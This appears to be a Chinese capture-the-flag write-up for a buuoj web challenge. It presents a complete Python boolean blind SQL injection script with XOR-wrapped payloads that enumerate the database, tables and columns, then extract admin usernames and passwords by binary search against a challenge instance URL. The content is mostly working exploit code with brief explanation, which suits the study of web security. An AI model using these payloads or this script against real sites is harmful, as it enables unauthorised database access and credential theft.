# [Black Watch 入群题] Web

# 1

`id` 参数存在 SQL 注入,且只能布尔盲注:响应是 JSON,需先解码,再以 id=1 时页面返回的固定特征字符串是否出现作为真/假判定:

import requests

flag = ''
# 查库名
payload1 = '1^(ascii(substr((select(database())),{},1))>{})^1'  # 库名为news

# 查表名
payload2 = '1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=\'news\')),{},1))>{})^1'  # 表名为admin,contents

# 查字段
payload3 = '1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=\'contents\')),{},1))>{})^1'  # admin表里有id,username,password,is_enable
# contents表里有id,title,content,is_enable

# 查字段值
payload4 = '1^(ascii(substr((select(group_concat(username))from(admin)),{},1))>{})^1'  # 分别查username和password

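# Target instance and the marker that only the legitimate id=1 row contains.
# Both are specific to this challenge deployment.
BASE_URL = 'http://8925938b-be36-44ef-a411-70363c14ef36.node5.buuoj.cn:81/backend/content_detail.php?id='
TRUE_MARKER = "札师傅缺个女朋友"
# Inclusive bounds for the per-character binary search. MySQL ascii() yields
# the leftmost byte (0..255) and 0 for the empty string that substr() returns
# once the position runs past the end of the value, so the range must start
# at 0 for end-of-string to be detectable. The original 28..137 range plus a
# `chr(mid) == ''` stop condition could never terminate early (chr() never
# returns ''), so all 99 positions were always queried.
LOW, HIGH = 0, 255
REQUEST_TIMEOUT = 10  # seconds; without it one stalled response hangs the dump
MAX_LENGTH = 100  # positions 1..99 are probed, as in the original


def _ask(session, position, threshold):
    """Ask the boolean oracle whether ascii(char at `position`) > `threshold`.

    payload4 is 1^(cond)^1: XOR gives id=1 (the row holding TRUE_MARKER)
    when cond is true and id=0 (no row) when it is false, so the marker's
    presence in the decoded JSON body is the answer.
    """
    url = BASE_URL + payload4.format(position, threshold)
    print(url)
    r = session.get(url, timeout=REQUEST_TIMEOUT)
    return TRUE_MARKER in str(r.json())


# One Session reuses the TCP connection across the several hundred probes.
with requests.Session() as session:
    for i in range(1, MAX_LENGTH):
        low, high = LOW, HIGH
        # Invariant: the byte value lies in [low, high]. "value > mid" moves
        # low past mid, otherwise high drops to mid; the loop ends with
        # low == high == value.
        while low < high:
            mid = (low + high) // 2
            if _ask(session, i, mid):
                low = mid + 1
            else:
                high = mid
        if low == 0:
            # ascii('') == 0: substr() ran past the end, the dump is complete.
            break
        # NOTE: chr() maps bytes >= 0x80 to Latin-1 code points; a multi-byte
        # UTF-8 value would need the raw bytes collected and decoded instead.
        flag += chr(low)
        print(flag)

print(flag)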

# 这段代码利用 id=1 时页面会返回固定特征字符串这一点作为判定:1^(条件)^1 在条件为真时等于 1(返回正常数据),为假时等于 0(无数据),由此逐字符布尔盲注;并用二分法把每个字符的请求次数降到约 8 次。

参考链接:https://blog.csdn.net/qq_46263951/article/details/119059485

